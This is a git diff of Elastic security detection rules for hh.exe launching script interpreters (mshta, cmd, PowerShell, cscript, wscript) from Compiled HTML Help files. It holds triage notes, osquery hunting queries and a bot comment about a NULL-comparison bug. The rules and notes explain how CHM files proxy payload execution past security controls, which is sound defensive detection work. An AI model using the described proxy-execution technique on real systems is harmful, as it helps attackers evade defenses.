@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json index 5a6a538c4a6..683cbe4b046 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json index fc379beebdc..461841a6128 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json 
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. 
`hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, 
modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json index 3977022a445..bebdf83b68d 100644 
--- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json 
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json index 1832175f192..dd5e6ed30d0 100644 
--- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json 
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n",
 "related_integrations": [
 {
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
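Review bot: The "Osquery - Retrieve Services Running on User Accounts" query carried in the new `note` line filters with `user_account == null`, and on SQLite (which osquery runs on) a comparison against NULL evaluates to NULL rather than false, so `NOT (... OR user_account == null)` is NULL for every row and the query should return no services at all — an analyst running it from the guide would wrongly conclude that nothing runs under a user account. The comparison should be `user_account IS NULL`, i.e. replace `OR\\nuser_account == null)` with `OR\\nuser_account IS NULL)` inside the JSON string (worth confirming against a live osquery before relying on the guide). This hunk only swaps the `\u003e` escapes for `>`, so the defect predates the commit, and since these package files appear to be generated copies the fix presumably belongs in the upstream rule source rather than here.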
diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json
index b4dd9fc6bed..89bdc786b45 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json
